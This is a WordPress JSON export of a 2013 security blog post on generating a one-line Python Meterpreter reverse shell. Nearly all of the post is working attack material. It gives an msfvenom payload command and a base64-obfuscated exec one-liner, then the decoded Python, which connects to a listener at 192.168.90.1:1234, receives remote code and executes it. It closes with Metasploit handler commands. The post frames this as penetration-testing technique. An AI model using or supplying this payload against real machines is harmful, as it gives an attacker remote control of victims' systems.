{"id":1126,"date":"2013-10-22T16:57:20","date_gmt":"2013-10-22T15:57:20","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=1126"},"modified":"2013-10-22T16:57:20","modified_gmt":"2013-10-22T15:57:20","slug":"one-line-python-meterpreter-reverse-shell","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2013\/10\/22\/one-line-python-meterpreter-reverse-shell\/","title":{"rendered":"One line python Meterpreter Reverse Shell"},"content":{"rendered":"<p>So not so recently support was added to metasploit for a <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/2244\" target=\"_blank\">native python meterpreter<\/a>. The cool thing about this is that the victim only needs to execute a few small lines of code.<\/p>\n<p>This means that if you&#8217;re performing a local lockdown test and manage to get access to a python shell it wont take much more effort to turn this into a meterpreter session.<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">msfvenom -f raw -p python\/meterpreter\/reverse_tcp LHOST=192.168.90.1 LPORT=1234<br \/>\nimport base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>This is just simply python code that is base64 encoded:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/><\/div><\/td><td><div class=\"python codecolorer\"><span class=\"kw1\">import<\/span> <span class=\"kw3\">socket<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">struct<\/span><br \/>\ns<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">2<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.90.1'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">1234<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\nl<span class=\"sy0\">=<\/span><span class=\"kw3\">struct<\/span>.<span class=\"me1\">unpack<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'&gt;I'<\/span><span class=\"sy0\">,<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">4<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span><span class=\"br0\">&#93;<\/span><br \/>\nd<span class=\"sy0\">=<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">4096<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"kw1\">while<\/span> <span class=\"kw2\">len<\/span><span class=\"br0\">&#40;<\/span>d<span class=\"br0\">&#41;<\/span><span class=\"sy0\">!=<\/span>l:<br \/>\n&nbsp; &nbsp; d+<span class=\"sy0\">=<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">4096<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"kw1\">exec<\/span><span class=\"br0\">&#40;<\/span>d<span class=\"sy0\">,<\/span><span class=\"br0\">&#123;<\/span><span class=\"st0\">'s'<\/span>:s<span class=\"br0\">&#125;<\/span><span class=\"br0\">&#41;<\/span><span class=\"st0\">&quot;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Then you just need to set up the listener within metasploit and hey presto!<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">msf3&gt; use exploit\/multi\/handler<br \/>\nmsf3&gt; set payload python\/meterpreter\/reverse_tcp <br \/>\nmsf3&gt; set LHOST 192.168.90.1<br \/>\nmsf3&gt; exploit<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So not so recently support was added to metasploit for a native python meterpreter. The cool thing about this is that the victim only needs to execute a few small lines of code. This means that if you&#8217;re performing a local lockdown test and manage to get access to a python shell it wont take [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[47,111,140],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1126"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=1126"}],"version-history":[{"count":2,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1126\/revisions"}],"predecessor-version":[{"id":1128,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1126\/revisions\/1128"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=1126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=1126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=1126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}